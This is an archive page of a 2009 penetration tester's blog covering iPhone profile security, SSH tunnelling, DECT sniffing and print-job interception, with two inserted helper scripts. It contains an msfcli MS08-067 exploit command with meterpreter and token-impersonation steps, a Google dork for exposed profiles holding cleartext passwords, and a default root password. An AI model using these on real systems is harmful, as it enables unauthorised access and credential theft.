Ramblings of the änal security guy

Sometimes pointless, always rambling, best ignored…

Archive for the ‘Technology’ Category

Playing with iPhone profiles

Posted by ChrisJohnRiley on December 4, 2009

It’s not often that I talk about a GOOD feature of the iPhone. Don’t get me wrong, I love my iPhone and it’s really changed the way I work and communicate, however Apple really only want you to use the device the way they want, not how you want. Still, I’ve recently been fighting with a few issues while traveling. The largest of these is the need to constantly change my APN settings whenever I fly somewhere. I usually travel with a small collection of pay as you go sim cards so that I can just touch down, plug in the sim and charge enough credit to cover a few days or weeks of data transfer. You’d be surprised at the prices you can find even on pay as you go nowadays. Anyway, this is all well and good, but wouldn’t it be nice if the APN settings (APN name, username and password) were automatically detected. Some sim cards do this, however most don’t (my O² sim card even fills it in with incorrect info). Today I finally had a chance to look at the iPhone configuration tool offered by Apple.

The iPhone configuration tool gives you a range of options to configure a single iPhone or multiple iPhones. It also offers the chance to do some security related configuration that you can’t achieve directly on the iPhone itself. The 2 things I was particularly interested in were the Passcode and APN (advanced) settings.

Whether you’re using this in a corporate or home environment, the configuration tool can help improve the security of your iPhone, as well as making it easier to turn settings on/off as required.

Passcode

By default the iPhone allows for a 4 character passcode to lock down your phone. This is great, but I’ve lost count of the number of times I’ve seen people type in their passwords. It’s not hard to remember a 4 digit passcode, and as the iPhone doesn’t randomize the layout of the numbers on the screen, it’s easy enough to figure out the password even without seeing which numbers are selected. Luckily the iPhone configuration tool gives you the chance to correct this.

Through the configuration tool you can set advanced passcode options that aren’t available directly on the iPhone itself. These include the complexity (including the number of non-alphanumeric characters required), minimum length, maximum password age, password history and the number of failed attempts allowed.

Alongside these typical settings you can also set the auto-lock and grace period times. Most importantly, from my perspective, you can enable the device erase function (this can also be enabled on the device directly).

When it comes to mobile devices, password enforcement is becoming more and more important. With the limited keyboard functionality and repetition of password entry (how many times a day do you type in your iPhone passcode ?) it’s important to make sure users (whether enterprise or home) don’t simplify the passcode too much. It’s very convenient to use 9999 as your passcode, but it’s not hard to shoulder-surf.

The above images show the default 4 character PIN style password, and the more extensive passcode options you can enable through iPhone configuration tool. The more security conscious may have noticed there are 3 images and not just 2. If you allow users to set digit only passcodes (i.e. an 8 character passcode like 12345678) then your users will be prompted ONLY to enter numeric values. If the user sets a more complex alphanumeric password, then they will be given a full keyboard for entry. This isn’t a BIG security issue, but it does tell you what kind of passcode they’ve selected without you needing to know the passcode itself. Still, it’s better than a 4 digit passcode ;)

APN (advanced)

The second feature that interests me is the advanced page, which allows you to set the APN and Proxy information. For me this is really handy. I can go into the configuration tool and create a profile for each APN setting combination that I need. When going between countries I can simply pull up the .mobileconfig file from my email (make sure you’ve got it cached) and apply it to the iPhone.

The advanced settings page also allows you to set a proxy for your communications. I’ve not had a chance to play with this setting yet to see what kind of security enhancement can be gained from this. In theory it would be nice to force ALL communications over an SSL secured proxy. This could then connect back to a trusted system to give you an extra layer of protection between your phone and home base. When travelling to a possibly dangerous environment (I’m thinking China, Russia, Ukraine, etc…) it would be nice to feel just a little bit more secure.

The good thing about profiles is that you can add and remove them at will. You can also have more than 1 profile active on the iPhone at once (as you can see I’ve got 4 currently). This allows you to add and remove them whenever you need to. It also means you can have a profile that applies your security settings and separate ones that apply just the APN info (as it’s likely to change more often than your security configuration). I’ve not had a chance yet to look at what happens when you set multiple profiles to contain settings that clash. I get the feeling that the LAST profile applied will override the earlier ones, but at the moment that’s just speculation on my part.

.mobileconfig

The files you export from the iPhone configuration tool are simple XML files. So if you find yourself out and about without the tool, you can still open the file up in a text editor and change the settings as required. If you do a Google search for “mobileconfig iphone” you’ll find a number of sites discussing the format. You can also check out the enterprise deployment documentation HERE for more hints. You can also download the configuration tool from the same location (Windows / OSX only).

Edit: After posting I did a little followup on the contents of the .mobileconfig file. When looking at the files created to implement specific APN settings, I noticed the following strings in the XML:

<key>apns</key>
<array>
  <dict>
    <key>apn</key>
    <string>payandgo.o2.co.uk</string>
    <key>password</key>
    <data>
    cGFzc3dvcmQ=
    </data>
    <key>username</key>
    <string>vertigo</string>
  </dict>
</array>

I can almost see people holding their heads in their hands. Yes, the password is stored Base64 encoded. I can understand why Apple have done this (to avoid issues with special characters corrupting the XML). However Base64 isn’t encryption. Luckily the APN settings are usually publicly available. However the .mobileconfig file can also contain data such as WPA keys, mail account passwords, and even LDAP and Exchange server settings. Surely these are protected in the XML by default, right?

<key>LDAPAccountDescription</key>
<string>LDAP Account</string>
<key>LDAPAccountHostName</key>
<string>server</string>
<key>LDAPAccountPassword</key>
<string>SecretLDAPpassword</string>
<key>LDAPAccountUseSSL</key>
<true/>

That’s what we like to see. Clear text passwords… However it’s not all bad, there is a solution, even if it’s not the default. When exporting the .mobileconfig file from the iPhone configuration tool, you can select to sign and encrypt the file. The downside of this is that you need to tie the .mobileconfig to an iPhone that has been registered in the iPhone configuration tool. This may not always be convenient, especially when your CFO is shouting that his wireless settings are wrong as he’s waiting for the 9th hole at the local golf club. Still, at least Apple have thought about the security risks. When creating a single profile for your entire corporation however, you’ll either need to register each iPhone in the configuration tool before exporting the file, or use the less secure, unencrypted, option.

So, if you’re a corporate using this feature for your CEO’s iPhone, remember to store the .mobileconfig in a safe place and use the sign and encrypt option (not the default, at least in my testing). If you’re a penetration tester, add this filetype to your list of files to look for next time you exploit a user’s system. You never know what you might find. If you want to know how bad it really is, try the following Googledork “filetype:mobileconfig”.
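As an added example (not code from the post or from Apple’s tool), here is a small shell audit for profiles that were exported without the sign and encrypt option: it reports every password-like key, says whether the value is cleartext or merely Base64 encoded, and decodes the latter to make the point that encoding is not encryption. The sample profile is constructed from the two fragments above with Apple’s outer payload keys omitted, and the only assumption about a signed export is that it is a DER/CMS blob whose first byte is 0x30 rather than XML.

```shell
#!/bin/sh
# profile_kind FILE -> "cms" for a DER/CMS container (the signed or
# signed+encrypted export), "xml" for a plain XML plist anyone can read.
profile_kind() {
    first=$(dd if="$1" bs=1 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')
    if [ "$first" = "30" ]; then echo cms; else echo xml; fi
}

# audit_profile FILE -> one "KEY<TAB>KIND<TAB>VALUE" line per key whose name
# contains password/passwd/secret. KIND is "cleartext" for <string> values
# and "base64" for <data> blobs, which are printed decoded.
audit_profile() {
    if [ "$(profile_kind "$1")" = cms ]; then
        echo "signed/encrypted CMS container; nothing readable in the clear" >&2
        return 1
    fi
    awk '
        /<key>/ {                      # remember which key the next value belongs to
            key = $0; sub(/.*<key>/, "", key); sub(/<\/key>.*/, "", key)
            want = (tolower(key) ~ /password|passwd|secret/)
            next
        }
        want && /<string>/ {           # value stored in the clear
            val = $0; sub(/.*<string>/, "", val); sub(/<\/string>.*/, "", val)
            printf "%s\tcleartext\t%s\n", key, val
            want = 0; next
        }
        want && /<data>/ {             # value stored as Base64, maybe over several lines
            blob = $0; sub(/.*<data>/, "", blob); indata = 1
        }
        indata {
            if ($0 !~ /<data>/) blob = blob $0
            if ($0 ~ /<\/data>/) {
                sub(/<\/data>.*/, "", blob); gsub(/[ \t]/, "", blob)
                printf "%s\tbase64\t%s\n", key, blob
                indata = 0; want = 0
            }
        }
    ' "$1" | while IFS="$(printf '\t')" read -r key kind val; do
        # Base64 is an encoding, not encryption: show what it decodes to.
        if [ "$kind" = base64 ]; then
            val=$(printf '%s' "$val" | base64 -d 2>/dev/null) || val="<undecodable>"
        fi
        printf '%s\t%s\t%s\n' "$key" "$kind" "$val"
    done
}

# Constructed sample (not a real export) mirroring the post's two fragments.
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>PayloadContent</key>
  <array>
    <dict>
      <key>apns</key>
      <array>
        <dict>
          <key>apn</key>
          <string>payandgo.o2.co.uk</string>
          <key>password</key>
          <data>
          cGFzc3dvcmQ=
          </data>
          <key>username</key>
          <string>vertigo</string>
        </dict>
      </array>
    </dict>
    <dict>
      <key>LDAPAccountHostName</key>
      <string>server</string>
      <key>LDAPAccountPassword</key>
      <string>SecretLDAPpassword</string>
      <key>LDAPAccountUseSSL</key>
      <true/>
    </dict>
  </array>
</dict>
</plist>
EOF

audit_profile "$SAMPLE"
```

Run it over a directory of exported profiles and anything it prints is a credential that should have been protected by the sign and encrypt export, or kept out of the profile altogether.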

Posted in Security, Technology | 3 Comments

Find files between 2 dates

Posted by ChrisJohnRiley on November 29, 2009

I thought I’d share a little tip I found recently. I was searching for a way to find files created between 2 dates on a Linux box. There’s a lot of reasons you might want to do this. Maybe you need to archive some files, maybe you’ve been breached and need to check what files have been modified. Whatever the reason, these are the commands to run that will do the job for you.

  • touch -m -t 200901010000 /tmp/startdate
  • touch -m -t 200901012359 /tmp/enddate
  • find . -newer /tmp/startdate ! -newer /tmp/enddate

The touch commands will create 2 reference files with the timestamp 01.01.2009 00:00 and 01.01.2009 23:59. Using these reference files you can then run the find command to find everything newer than the first file, but NOT newer than the second file. Remember to delete the files from /tmp when you’re done ;)

  • rm /tmp/startdate /tmp/enddate

I’ll try and write-up a script for the PenTester Scripting project when I get some time.
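The same two-reference-file trick wrapped in a function, as an added example rather than the post’s own script: the reference files come from mktemp instead of fixed names in the shared /tmp, the search is limited to regular files, and a constructed sample tree shows the window working.

```shell
#!/bin/sh
# find_between DIR START END
# Lists regular files under DIR modified after START and not after END, where
# START and END use touch's [[CC]YY]MMDDhhmm format. Reference files are
# created with mktemp so nobody else can pre-create /tmp/startdate for you.
find_between() {
    dir=$1; start=$2; end=$3
    ref_start=$(mktemp) || return 1
    ref_end=$(mktemp) || return 1
    touch -m -t "$start" "$ref_start"
    touch -m -t "$end" "$ref_end"
    # -newer is strictly "modified after"; "! -newer" keeps anything at or before END.
    find "$dir" -type f -newer "$ref_start" ! -newer "$ref_end"
    rm -f "$ref_start" "$ref_end"
}

# Constructed sample tree: one file before the window, one inside, one after.
demo_dir=$(mktemp -d)
touch -m -t 200812311200 "$demo_dir/old.log"
touch -m -t 200901011030 "$demo_dir/inwindow.log"
touch -m -t 200901021000 "$demo_dir/new.log"
find_between "$demo_dir" 200901010000 200901012359   # prints only inwindow.log
```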

Posted in Security, Technology | Leave a Comment

Filling your ipod…

Posted by ChrisJohnRiley on September 5, 2009

Over some drinks at the last CERT.AT meeting in Vienna, the topic of security podcasts came up. It’s a topic that seems to be discussed a lot, and everybody has their own set of favourite podcasts that they listen to. So I’ve finally had time to sit down and go through my podcast list to pull out some of the ones I feel are worth listening to. Podcasts are a personal thing. Some people like highly technical podcasts, others like more operational style topics. I try to mix them up a little to get a bit of everything. Hope you enjoy, and if there’s something good that’s not on my list, please let me know. I can’t promise I’ll listen, but I’d be happy to try it out.

  • BruCON Podcast –> iTunes Link

    • The official Brucon conference podcast
  • Cloud Security Podcast –> iTunes Link

    • Cloud security news, events, analysis and interviews
    • Hosted by Craig Balding & Chris Hoff
  • Crypto-Gram Security Podcast –> iTunes Link

    • Audio version of Bruce Schneier’s Monthly Crypto-Gram Newsletter
  • Cyberspeak –> iTunes Link

    • Computer crime and forensics podcast
  • Exotic Liability –> iTunes Link

    • Explicit: Exotic Liability will push you into the new generation of Security
    • The only podcast to merge stripper jokes with security topics
  • GRM N00bs Security Podcast –> iTunes Link

    • The GRM n00bs chat about various security topics
    • New podcast, a little rough around the edges, but hey, I don’t see you (or me) doing any better ;)
  • (HPR) Hacker Public Radio –> iTunes Link

    • Explicit: Technology, Open Source, Hacking –> Various topics, released daily – Community Driven
    • Checkout the website for more information on how to take part
    • See episode 315, 420 and 445 for my contributions (so far…)
  • Hak5 –> iTunes Link

    • Video: Put together a band of IT ninjas, security professionals and hardcore gamers, Hak5 isn’t your typical tech show
  • Internet Storm Center Threat Update –> iTunes Link

    • Monthly podcast covering current network security threats
  • Network Security Podcast –> iTunes Link

    • Podcasting talking about the security issues that are relevant today such as consumer privacy and PCI-DSS.
  • OWASP Security Podcast –> iTunes Link

    • Join a wide variety of web application security experts as they examine the multiple aspects of application and software security.
    • Also posted are audio recordings from OWASP conferences
  • Pauldotcom Security Weekly –> iTunes link

    • IT Security news, research, vulnerability discussions and interviews –> one of the best podcasts around
    • Checkout iTunes for a video feed also (not updated often)
  • Risky Business –> iTunes Link

    • Australian podcast discussing the latest security news, with interviews and discussion pieces.
  • RB2 (Risky Business 2) –> Feed Link

    • Recorded conference presentations, single-shot interviews with industry players, freelance contributions and more.
  • SANS Internet Storm Center StormCast –> iTunes Link

    • Daily microcasts summarizing information security issues of the last 24 hours
    • Short and sweet. Great to keep yourself up-to-date on new attacks and issues
  • SecuraBit –> iTunes Link

    • Explicit: Computer security podcast brought to you by Anthony Gartner, Chris Gerling, Chris Mills, and Jason Muellner.
  • Security Justice –> iTunes Link

    • Explicit: Discussing security regarding technology and computers but also providing information and news about physical security.
  • SMBMinute –> iTunes Link

    • Technology for SMBs
  • SpiderLabs Radio –> iTunes Link

    • Monthly DJ Mixes and interviews with Spiderlabs security professionals
    • Mostly music, but worth it for the interviews even if you don’t need music to hack to ;)
  • Tenable Network Security –> iTunes Link

    • Official podcast of Tenable Network Security and the Nessus vulnerability scanner
    • Corporate podcast. Newly formed with Paul from pauldotcom.
  • 2600: The Hacker Quarterly –> iTunes Link

    • The Hacker Quarterly. Combined feed of Off the Hook and Off the Wall shows.
    • Lots of fundraisers, but occasionally interesting content
  • Midwest Teen Sex Show –> iTunes Link

    • Non-Security, hilarious/VIDEO: Podcast for teens and adults covering the wonderful, awkward, stimulating, sticky world of sex.
    • Trust me, you WILL laugh a lot. Unless of course you hate sex and jokes, in which case, don’t even click the link ;)

Well there it is, my shortened list of security podcasts (currently). I tend to switch and change depending on what’s happening at the time and what my schedule is like. I’ve also skipped a few that don’t seem to be updating very regularly as there is a chance they’re off the air (blue box podcast, sploitcast spring to mind). I also snuck in one non-security podcast at the end. Give it a shot, it’s hilarious in an educational and strange way. If you’re into Linux as well, check out the guys at Jupiter Broadcasting.

As I said before, if you’ve got some podcasts (good ones that is. Please don’t link me to Security NOW) that aren’t on my list, just let me know, and I’ll give them a shot.

Posted in Security, Technology | 5 Comments

Fixing Cydia

Posted by ChrisJohnRiley on July 19, 2009

At some point in the last 24 hours Saurik released a couple of updates to Mobilesubstrate through Cydia. Usually I try to keep updated with the latest and greatest (I’m a technology junkie) so I ran the upgrade while I grabbed my morning cup of tea (I’m also English after all). Normally after an upgrade you’ll see a prompt to restart springboard, however with this update the phone rebooted part way through the install. A worrying signal. After the reboot everything seemed to be fine, except Cydia refused to start fully. After showing the default Cydia screen for a few seconds, Cydia would disappear.

After a couple of reboots to make sure the issue wasn’t going to solve itself, I had a quick look on Saurik’s twitterfeed but he had no mention of the issue. Several followers however were having the same issue. Time to find a solution.

I dropped to the terminal (although making an SSH connection would also have done the trick) and su’d to root. For those new to this the default password for root is alpine and if you’ve upgraded to version 3.0 this WILL have been reset. So change the root and mobile users passwords using ‘passwd’ before somebody else connects and does ;) Anyway, I digress.

After getting root access it was time to see what state the mobilesubstrate and cydia packages were in. After an ‘apt-get update’ (to get the updated package lists) and an ‘apt-get install cydia’ it looks like the package is corrupted, as I’m prompted to run the dpkg configure:

dpkg --configure -a

After this is completed, I reran the ‘apt-get install cydia’, and then an ‘apt-get upgrade’ to reinstall the failed mobilesubstrate and, in my case, the new VoIP 3G app. After another reboot (type reboot at the prompt or whatever your preferred method is) things seem to be running fine again.

For those with short attention spans:

  • Shell access (terminal or ssh)
  • Su to root
  • dpkg --configure -a
  • apt-get update
  • apt-get install cydia (if this fails add --fix-missing)
  • apt-get upgrade (to install mobilesubstrate correctly)
  • reboot

I hope this solves your issues as easily as it did mine. Let me know if you have any issues.

Update: There are a few other guides going around telling you to connect the iphone to your system (or use iFile) and then delete specific files. I’ve not tested these fixes, but the chance of deleting files you need is always there. I’d suggest using the easy fix using apt-get before trying the file deletion route. However it’s a personal choice.

Update: As a few comments have noted, the nice people at wordpress reformed the -- into a single – when displaying the page. This should now be fixed using the magic trickery of HTML comments to split the two characters ;)

Posted in Technology | 16 Comments

Protecting your browsing with iPhone SSH tunnels

Posted by ChrisJohnRiley on June 21, 2009

Most of the time I feel relatively secure when I’m browsing the web or checking twitter on my iPhone. That said, I rarely use the built in wireless for these purposes, and rely instead on the reasonably good 3G network in Austria. When I’m out of the country I usually try to buy a pay-as-you-go sim card and pay for the daily data transfer. This isn’t as expensive as you’d think. For example in the Netherlands it costs around €3.50 per day of data transfer. Not cheap if you’re using it long-term, but if you’re only there for a couple of days it’s a lot cheaper than paying for a hotel WLAN that’s insecure and only works inside the hotel. Still, this solution doesn’t work everywhere and isn’t for everyone. The fallback is to use whatever wireless you can find, insecure or not. This is something I’ve been fighting with for a while now. Stemming (mostly) from my unwillingness to setup a VPN server (my home ADSL isn’t good enough quality, and doesn’t have a fixed IP) or pay a huge price for a VPN solution through my existing hosting provider (thanks for the cheap hosting Dreamhost).

[Screenshot: iPhone HTTP proxy settings]

The iPhone (at least version 2.2.1) supports the use of HTTP proxies when connecting via a wireless connection. This is great. Surely I can setup an SSH Tunnel to my server and tell the iPhone to use this as a SOCKS proxy. As with everything on the iPhone however, simple always turns into complicated very quickly. I experimented with this solution and found that the HTTP proxy support was really just that, HTTP proxy support and nothing else. So back to the drawing board. I searched for another solution and settled on using the 3proxy application (in cydia for those lucky enough to have a jailbroken iPhone) to setup a local HTTP proxy.

A few requirements to get this up and running on your iPhone.

  • A Jailbroken iPhone (or iPod Touch)
  • SSH Client installed
  • 3proxy (available in cydia)
  • terminal application
  • An SSH server (setup for either password or certificate access)
  • Backgrounder (or some other way to run commands and have them running in the background)
  • OPTIONAL: iFile (easy file editing)

Starting off we’ll take a look at the configuration of 3proxy. By using the following configuration you tell 3proxy to forward all traffic to a second proxy server, this time a SOCKS proxy (in this case my SSH tunnel).

#!/usr/bin/3proxy
daemon
auth iponly
log /var/log/3proxy.log D
rotate 5
fakeresolve
internal 127.0.0.1
allow * * 127.0.0.1
parent 1000 socks5+ 127.0.0.1 8081
proxy -p8080 -a -i127.0.0.1

The quick rundown on the above configuration.

  • #!/usr/bin/3proxy – Tells the script what interpreter program to use
  • daemon – Tells 3proxy to run as a background process
  • auth iponly – sets the authorization to be ip restricted
  • log – Setup a log that rotates daily (the D option)
  • rotate 5 – Sets the number of log files to keep before rotating
  • fakeresolve – Tells 3proxy to route DNS lookups through the proxy
  • internal – Listen on the internal interface only
  • allow – Currently set to * for all (you can limit this by username/password or IP, however this caused issues in testing)
  • parent – This is where we’re setting the next proxy in the chain (1000 means always use this parent, SOCKS5+ is the type, followed by the SSH tunnel’s listening ip and port)
  • proxy – this final command tells 3proxy to start a proxy on port 8080 using anonymous proxy mode (-a) and listen only on the internal loopback

You can find more configuration information on the 3proxy website. Although leaving the allow set to * (all) is a concern, remember that the proxy is only listening on the localhost address and from outside the port is blocked.

[Screenshot: port scan of the iPhone showing the proxy port closed from outside]

Now that we’ve got the 3proxy.cfg file saved (mine’s stored in /usr/bin with the 3proxy executable) you’ll need to run chmod +x to make it executable. Next up is the SSH Tunnel, and doing this on an iPhone isn’t much different to a normal linux system (just harder to type for obvious reasons). I opted to add a certificate for quick easy access and restricted access to the certificate to the root user on the iPhone (you have changed your root password right ???). I added the private key to ~/.ssh/id_dsa (or id_rsa, your choice) and set up a bash script to kick off the SSH tunnel (typing that command each time gets boring fast).

ssh -D 8081 -N -C username@remotehost.your.domain -2 -p 64000 -i /home/root/.ssh/id_dsa

The above command is a simple SSH tunnel setup to connect to port 64000 on remotehost.your.domain and logon as the user username using the certificate file stored in /home/root/.ssh/id_dsa. It will then setup a local listener on port 8081 and dynamically route all traffic coming to this port through the SSH tunnel. As we’re treating the tunnel as a SOCKS proxy we don’t need to have anything else setup at the other end (no other proxy server waiting to route the requests) although you could setup privoxy or any other kind of proxy if you wanted more control.

So, now that we have the two parts of our configuration ready we just need to drop to the shell and kick off the SSH Tunnel (using your bash script), and then start up 3proxy using the /usr/bin/3proxy.cfg command. I’ve linked it all into a single bash script to make things a little quicker.
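One way to write that combined script, as an added example rather than the post’s own: it brings the tunnel and 3proxy up together, keeps the tunnel redialling when the connection drops (the screen-lock problem from the TODO list further down), and tears both down with a plain TERM to recorded PIDs instead of kill -9. The host, user, port and key path are the placeholders from the ssh command above; it also assumes the 3proxy config contains a pidfile line (a 3proxy directive) pointing at the path in PROXY_PID.

```shell
#!/bin/sh
# tunnel.sh start|stop|status  (added example; paths and host are placeholders)
SOCKS_PORT=8081
REMOTE="username@remotehost.your.domain"
REMOTE_PORT=64000
KEY_FILE="/home/root/.ssh/id_dsa"
PROXY_CFG="/usr/bin/3proxy.cfg"           # executable config, as in the post
PID_DIR="${PID_DIR:-/var/run/tunnel}"
TUNNEL_PID="$PID_DIR/tunnel.pid"
PROXY_PID="$PID_DIR/3proxy.pid"           # must match the pidfile line in 3proxy.cfg

# Assemble the ssh command line. ServerAliveInterval/CountMax make ssh exit
# when the link is dead instead of hanging, and ExitOnForwardFailure stops a
# tunnel that could not bind the SOCKS port (3proxy would have no parent).
tunnel_cmd() {
    printf 'ssh -D %s -N -C -2 -p %s -i %s -o ExitOnForwardFailure=yes -o ServerAliveInterval=30 -o ServerAliveCountMax=3 %s' \
        "$SOCKS_PORT" "$REMOTE_PORT" "$KEY_FILE" "$REMOTE"
}

# Returns 0 when PID is non-empty and refers to a live process.
is_running() {
    [ -n "$1" ] && kill -0 "$1" 2>/dev/null
}

# Reconnect loop; this is the process whose PID gets recorded. A TERM sent
# to the loop is forwarded to the current ssh child before the loop exits.
tunnel_loop() {
    trap 'kill "$child" 2>/dev/null; exit 0' TERM INT
    while :; do
        $(tunnel_cmd) &
        child=$!
        wait "$child"
        sleep 5      # short pause before redialling after a drop
    done
}

start() {
    mkdir -p "$PID_DIR"
    if is_running "$(cat "$TUNNEL_PID" 2>/dev/null)"; then
        echo "tunnel already running" >&2
        return 1
    fi
    tunnel_loop &
    echo $! > "$TUNNEL_PID"
    # The config's "daemon" line backgrounds 3proxy; its pidfile line records the PID.
    "$PROXY_CFG"
}

stop() {
    for f in "$PROXY_PID" "$TUNNEL_PID"; do
        pid=$(cat "$f" 2>/dev/null)
        is_running "$pid" && kill "$pid"
        rm -f "$f"
    done
}

status() {
    for f in "$TUNNEL_PID" "$PROXY_PID"; do
        if is_running "$(cat "$f" 2>/dev/null)"; then echo "$f: up"; else echo "$f: down"; fi
    done
}

case "${1:-}" in
    start)  start ;;
    stop)   stop ;;
    status) status ;;
    "")     ;;    # no action when sourced or run without arguments
    *)      echo "usage: $0 start|stop|status" >&2; exit 2 ;;
esac
```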

In testing Safari works pretty well (minor decrease in performance as you’d expect). Twitterfon was the second application I tested. Although this follows the HTTP proxy rule, it still insists on doing DNS lookups for advertising outside of the proxy. This is also the case for a couple of other applications. Mail doesn’t follow the HTTP rules, however you can easily setup additional 3proxy ports for these, or use SSL and make sure your DNS is all piped over the local listener and through the SSH tunnel (3proxy supports a DNS caching proxy, tcp and udp forwarding proxies also).

[Screenshots: Safari No Proxy, Twitterfon No Proxy, Twitterfon Through Proxy]

Supported:

  • Safari
  • Twitterfon (partially: Advert DNS lookups are still a possible concern/attack vector)
  • Cydia
  • AppStore
  • iTunes
  • Youtube
  • Weather
  • GRiS
  • WordPress (partially: As with the Twitterfon issue, the DNS appears to ignore the HTTP proxy settings)

Obviously these were just the applications I tested. I’d suggest running your own tests to ensure that you’re seeing the same results.

Not-Supported:

  • Mail (setup a port forwarder to achieve support for email)
  • Siphon (This is a real disappointment)
  • F-Stream
  • … probably more, so your mileage may vary

If you test any other applications please let me know and I’ll add it to my list.

Once you’ve finished using the SSH Tunnel and proxy, remember to kill -9 them using the console.

TODO:

  • Test with alternative “allow” settings to restrict access further (username/password too easy)
  • Prevent initial DNS lookup on SSH Tunnel (i.e. dyndns service)
  • Log Bug with Twitterfon regarding DNS lookups
  • Find an easier way to trigger the tunnel & 3proxy build-up/tear-down
  • Resolve issue of tunnel disconnecting when screen gets locked (FOR loop ???)
  • Use the tunnel for 3G connections (paranoid much !!!)

Posted in Security, Technology | 12 Comments

MS09-012: Fixing “Token Kidnapping”

Posted by ChrisJohnRiley on April 15, 2009

This was the headline that grabbed my attention this morning on the Microsoft Security & Defence Blog. Had Microsoft finally patched the token impersonation flaw (or feature as Microsoft regard it) that is used by the Incognito tool to allow a compromised system level account to impersonate local or domain users? In short no, and I say that with mixed feelings.

As a penetration tester, I can breathe a sigh of relief and know that this attack vector is still open. As a defender, the chance that Microsoft had changed the way this functionality works to block the attack was a welcome update to protect our systems. Still, you can’t expect Microsoft to repair something they see as a feature and the way things should work. Some things aren’t meant to be repaired I guess.

Testing

Just to make sure that Microsoft hadn’t broken the Incognito functionality while messing with the way tokens work, I ran a couple of tests against a Windows XP service pack 2 machine.

I started off with an unpatched version and ran the trusty MS08-067 exploit to get a meterpreter shell.

./msfcli exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/bind_tcp LHOST=192.168.0.104 RHOST=192.168.0.103 E

This functioned as you’d expect and resulted in a meterpreter shell running under the Local System Account. After running the “use incognito” command I listed the tokens using “list_tokens -u”.

[Screenshot: incognito1 – token list on the unpatched system]

Taking the local account “pentestuser” as the token to impersonate, I ran “impersonate_token PENTEST-3C73D9Cpentestuser”

[Screenshot: incognito2 – impersonation on the unpatched system]

Success, as expected on the unpatched system. Next up, I patched the system, rebooted and repeated the same msfcli exploit (MS08-067). This time however the exploit failed on the first run as it couldn’t isolate the exact service pack version. Metasploit listed it as Service Pack 2+ (which is technically correct). Re-running the command completed the exploit however.

[Screenshot: incognito3_after-patch]

Even after the patch everything seems fine in the token list.

[Screenshot: incognito4_after-patch – token list after the patch]

The final test, impersonation of the PENTEST-3C73D9Cpentestuser user. As before this went off without a hitch, giving us access to the local user without error.

Conclusion

Microsoft have patched the flaws listed in KB952004 without affecting the Incognito tool (or the implementation of the tool within Metasploit). Good for attackers, bad for defenders. But you can’t always have it both ways can you. I doubt that we’ll be seeing a patch against the token impersonation flaw used in incognito anytime soon, if at all.

I’m heading to Blackhat Europe in a few hours (courtesy of a last minute press registration). If you’re there feel free to drop me a line and buy me a drink ;) –> contact [at] c22 [dot] cc

Posted in Metasploit, Penetration Test, Security, Technology | 3 Comments

DECT Interception

Posted by ChrisJohnRiley on April 4, 2009

[Screenshot: dect_cli]

I’ve been playing about with the com-on-air and tools from dedected for a few weeks now. Results are mixed, as those who’ve sat through the few demos I’ve run can certainly attest to. Things are still in the early phases for the dedected tools and as much as I love what’s already there, it’s not really ready for the mainstream yet. Don’t get me wrong, what’s been done is already amazing work, but for the penetration testers amongst you wanting to grab a com-on-air card from ebay and start running tests, things aren’t always going to be 100%. Still, it makes managers sit up and pay attention if demonstrated correctly.

As an example of the issues, I’ve built the drivers and tools from source on 3 or 4 systems now (Fedora, Debian, and Backtrack 3 and 4). Compiling resulted in mixed results (some compile errors) and random capture failures (just capturing static as if the course was encrypted). You’ll also probably get a few kernel panics before you learn to respect the driver and not expect hotswap support just yet. After one too many hit and miss captures from the compiled versions, I opted to go for the Chaox-ng boot USB which includes everything (yes I do mean everything) built in. I find that this USB boot option just adds to the effect when it comes to demos. You turn up with a PCMCIA card and a 1 GB USB stick. That and any laptop will do the job.

[Screenshot: Wireshark SVN]

The Chaox-ng distro includes the drivers and tools compiled to perfection (no capture issues here). The latest version also includes the SVN version of Wireshark (with DECT PCAP support). Kismet newcore is compiled in with the DECT plugin if you want to play about with this as well. About the only thing missing is the Metasploit auxiliary modules, but that always was just a Proof of Concept and not very functional. Personally I stick to using the ‘dect_cli’ tool (alongside pcapstein, pcap2chan and Wireshark). For those that are interested I’ve uploaded a few packet captures for you to take a look at.

Plantronics CS60 Captures (Encrypted B-Channel)

Siemens GIGASET (Unencrypted B-Channel)

  • German Test Call (pcap) — HERE
  • German Test Call (g721, wav) — HERE

[Screenshot: kismet-newcore]

The Plantronics PCAPs are interesting to look at and see how the communications between the base unit and headset are handled. At this point I’ve not looked too much into the encryption implemented. From a couple of test calls the Plantronics appears to initiate the call and then encrypt a fraction of a second after the call begins. I’m leaning towards a standard implementation of DSC (DECT Standard Cipher) instead of a proprietary Plantronics implementation. Pity, as I was hoping for something in the pairing process that would signal a handshake and key creation process. I’ll leave the encryption work to people much smarter than me however. I just like to play with the new toys ;)

DSAA (DECT Standard Authentication Algorithm) has already been reversed (see details here and the paper on the subject here). So next up will be the DSC hopefully. We’ll have to see how much longer the “Security through obscurity” of DECT works. I hope, for their sake, that they’ve implemented defence-in-depth ;)

Posted in Penetration Test, Security, Technology | 2 Comments

Man in the Middling Printers

Posted by ChrisJohnRiley on March 22, 2009

This one has been rattling around in my head for a while, and since I’ve found myself with a few spare minutes, it’s time I wrote it up for your enjoyment and mine. This is certainly nothing new, but it’s one of those things that people seem to discount when performing penetration testing. After all, printers aren’t really cool anymore.

MITM attacks are often talked about together with credential stealing or traffic manipulation (inserting javascript into http streams). The new tool from Inguardians (the Middler) is a prime example of where the focus is right now. Although the middler was designed as a tool for performing attacks on all kinds of protocols, the examples provided with the alpha all focus on http(s) traffic. However what I want to talk about was using MITM attacks to steal confidential data in the form of print jobs.

When it comes to stealing data, most of the time you’re going to need a valid username/password to gain access. Sure, you can exploit systems, use pass-the-hash or go the social engineering route, but you’re going to need access. However, in this day and age of the failed paperless office, why go to those lengths when you can just steal the documents straight from the print queue? We all know how to perform ARP or DNS poisoning to insert a system into the flow of traffic, but with printers this job is made so much easier by the overall lack of security on print devices.

There are four easy methods for stealing print jobs that spring to mind, other than using standard ARP or DNS spoofing attacks.

  1. Physical access – A majority of printers offer unprotected access to the menu. Through physical access you can change the printer’s IP address and assume the original for yourself.
  2. Telnet access – Not seen so often in modern printers, but it can give you complete access if the passwords are blank or left at default. Again, reset the IP address and assume the original.
